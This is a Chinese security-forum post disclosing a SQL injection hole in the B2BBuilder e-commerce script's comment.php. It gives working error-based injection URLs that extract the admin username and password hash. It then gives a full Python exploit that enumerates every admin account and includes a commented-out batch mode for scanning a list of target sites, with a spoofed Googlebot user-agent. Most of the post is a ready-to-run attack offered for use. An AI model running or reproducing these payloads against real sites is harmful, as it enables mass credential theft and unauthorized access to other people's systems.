[我爱t00ls] B2BBuilder 又一注入漏洞

2013-09-05 02:51:59 31 4359 1


嘿嘿 看小小abc发了一个B2BBuilder漏洞,于是乎恍然大悟,不能死啃ecshop了,换个口味 就下载了一套B2BBuilder源码,抽根烟观之,

在comment.php中文件代码如下:
if (!empty($_GET['ctype']))

{

        if ($_GET['ctype']==1)

           $sql="select title from ".NEWSD." where  nid=".$_GET['conid'];

        if ($_GET['ctype']==2)

           $sql="select title from ".INFO." where  id=".$_GET['conid'];

        if ($_GET['ctype']==3)

           $sql="select pname as title from ".PRO." where   id=".$_GET['conid'];

        if ($_GET['ctype']==4)

           $sql="select title from ".EXHIBIT." where  id=".$_GET['conid'];

        if ($_GET['ctype']==5)

           $sql="select downname as title from ".down." where  id=".$_GET['conid'];

        if ($_GET['ctype']==7)

                   $sql="select projecttitle as title from ".PROJECT." where  id=".$_GET['conid'];

        $db->query($sql);

        $titlemsg=$db->fetchRow();

        $titlem=$titlemsg['title'];

        $tpl->assign("tmsg",$titlem);

}  



点好  无须解释,直接上exp
爆账号:https://www.t00ls.com/comment.php?ctype=2&conid=12345 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,b2bbuilder_admin.user,0x27,0x7e) from `b2bbuilder`.b2bbuilder_admin Order by user limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

爆密码:https://www.t00ls.com/comment.php?ctype=2&conid=12345 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(b2bbuilder_admin.password as char))),0x27,0x7e) from `b2bbuilder`.b2bbuilder_admin Order by user limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

由于我工具的需要,写了个插件 一起共享上来吧,
#! /usr/bin/env python

#coding=utf-8

#[我爱t00ls] B2BBuilder 又一注入漏洞   by 少校 QQ1006079161

#参考[url]https://www.t00ls.com/thread-24143-1-1.html[/url]



import re

import httplib



def get_http_request(arg,site):

    headers = {'User-agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +[url]http://www.google.com/bot.html[/url])'}

    try:

        conn = httplib.HTTPConnection(arg)

        conn.request('GET',site,None,headers)

        httpres = conn.getresponse()

        html = httpres.read()

        return html

    except Exception,e:

        print e

        return ""

def get_html(arg,databasename,tablefristname,nb):

    info = []

    username_data = '''/comment.php?ctype=2&conid=12345%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,'''+tablefristname+'''_admin.user,0x27,0x7e)%20from%20%60'''+databasename+'''%60.'''+tablefristname+'''_admin%20Order%20by%20user%20limit%20'''+str(nb)+''',1)%20)%20from%20%60information_schema%60.tables%20limit%200,1),floor(rand(0)*2))x%20from%20%60information_schema%60.tables%20group%20by%20x)a)%20and%201=1'''

    password_data = '''/comment.php?ctype=2&conid=12345%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,unhex(Hex(cast('''+tablefristname+'''_admin.password%20as%20char))),0x27,0x7e)%20from%20%60'''+databasename+'''%60.'''+tablefristname+'''_admin%20Order%20by%20user%20limit%20'''+str(nb)+''',1)%20)%20from%20%60information_schema%60.tables%20limit%200,1),floor(rand(0)*2))x%20from%20%60information_schema%60.tables%20group%20by%20x)a)%20and%201=1'''

    for testdata in [username_data,password_data]:

        html = get_http_request(arg,testdata)

        if html:

            username = re.findall('''Duplicate entry '~'(.{2,30})'~''',html,re.I)

            password = re.findall('''Duplicate entry '~'(\w{32})'~''',html,re.I)

            if username:

                info.append(username[0])

            if password:

                info.append(password[0])

    return info



def main(arg):

    global nb

    nb = 0

    stop = False

    tableinfo = []

    errors = []

    username_password = []

    data_path = '''/comment.php?ctype=2&conid=1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1'''

    good = get_http_request(arg,data_path)

    if good:

        dataname = re.findall("Duplicate entry '~'(.*?)'~",good,re.I)

        tablename = re.findall("title from (.*?)_offer where",good,re.I)

        error = re.search("information_schema`.tables|your SQL syntax|check the manual that corresponds|MySQL server version",good,re.I)

        if error:

            errors.append("powered by mdbhack QQ1006079161")

        if dataname:

            tableinfo.append(dataname[0])

        if tablename:

            tableinfo.append(tablename[0])        

    if len(tableinfo) == 2:

        while 1:

            if stop:

                break

            infos = get_html(arg,tableinfo[0],tableinfo[1],nb)

            if len(infos) == 2:

                username_password.append(infos)

                nb += 1

            else:

                stop = True

        for username,password in username_password:

            print username,password

    else:

        if errors:

            print u"存在sql报错语句,请放入扫描器注入%s/comment.php?ctype=2&conid=shaoxiao" % arg

        else:

            print u"不存在注入漏洞!"

        

        

if __name__ == '__main__':

    main("www.t00ls.net")

    '''

    for url in open("url.txt",'r'):#批量开关

        if url.strip().startswith("http"):

            main(url.strip().split('//')[1])

        else:

            main(url.strip())

    '''
类别 Web安全

关于作者

100607916152篇文章959篇回复

热爱就是热爱,不弃不离!

1006079161
31

评论31次

要评论?请先  登录  或  注册